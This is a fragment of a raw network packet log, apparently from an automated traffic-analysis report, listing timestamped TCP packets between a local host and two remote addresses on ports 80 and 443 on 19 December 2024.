                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760181904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760195971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760238886 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760308027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760787964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760802031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760858059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761178970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761190891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761203051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761279106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761279106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761883974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761898041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761910915 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.761986971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762036085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762607098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762622118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762701988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762701988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762969971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762983084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.762995958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763015985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763042927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763684034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763698101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763710022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763803005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.763803005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764655113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764669895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764703989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764734030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764755011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764767885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764784098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764842033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.764842033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.765558004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.765578985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.765593052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.765676022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.765676022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.766310930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.766324997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.766335964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.766350031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.766362906 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.766436100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767066956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767090082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767102957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767138958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767138958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767807961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767821074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767832041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767863989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.767920971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.768541098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.768554926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.768568039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.768580914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.768599033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.768666983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.888420105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.888731003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.888792992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.888830900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.888890982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.888890982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889118910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889199018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889324903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889360905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889405012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889442921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889838934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889920950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889966011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.889966011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890104055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890135050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890187025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890189886 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890222073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890242100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890273094 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890903950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.890986919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.892251968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.892286062 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.892339945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.892339945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.892949104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.892982960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.893034935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.893034935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.894484043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.894541025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.895207882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.895242929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.895277023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.895298958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.895328045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.895339012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.897608042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.897644043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.897697926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.897697926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.898252964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.898288965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.898320913 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.898489952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.899837017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.899871111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.899904013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.899945974 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.899945974 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.900054932 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.900544882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.900701046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.902348042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.902383089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.902419090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.902439117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.902439117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.902553082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.903078079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.903215885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.904459000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.904495001 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.904624939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905092001 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905128002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905163050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905169010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905204058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905296087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905963898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.905999899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.906035900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.906047106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.906047106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.906172991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.946703911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.946796894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.946887016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.946924925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.946991920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.947418928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.947515011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.947624922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.947664022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.947771072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.947993994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948060989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948127031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948177099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948358059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948429108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948460102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948494911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948553085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948576927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.948599100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949171066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949208021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949240923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949281931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949385881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949419975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949455976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949479103 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.949542999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950015068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950047970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950087070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950130939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950149059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950701952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950737000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950767040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950773954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950818062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.950818062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951360941 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951395988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951414108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951435089 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951778889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951813936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.951848984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952343941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952490091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952534914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952614069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952847004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952881098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952909946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952914953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952960014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.952975988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.953669071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.953701019 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.953736067 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.953747988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.953778982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.953778982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.954338074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.954374075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.954408884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.954432964 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.954497099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955105066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955141068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955178976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955219030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955425024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955460072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955493927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955533028 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.955607891 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.956104040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.956121922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.956136942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.956197977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.956197977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957331896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957345009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957355976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957370043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957381964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957436085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957436085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957948923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957962036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.957972050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958031893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958031893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958698034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958709955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958719969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958733082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958790064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.958827972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.959542990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.959556103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.959567070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.959856987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960235119 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960258007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960269928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960565090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960951090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960963011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.960973024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.961061954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.961061954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.028486013 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.028661013 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.028748035 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.028748035 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.028794050 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.028886080 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.029059887 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.046634912 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.046730042 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.046751022 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.047363997 CET44349745104.21.67.146192.168.2.4
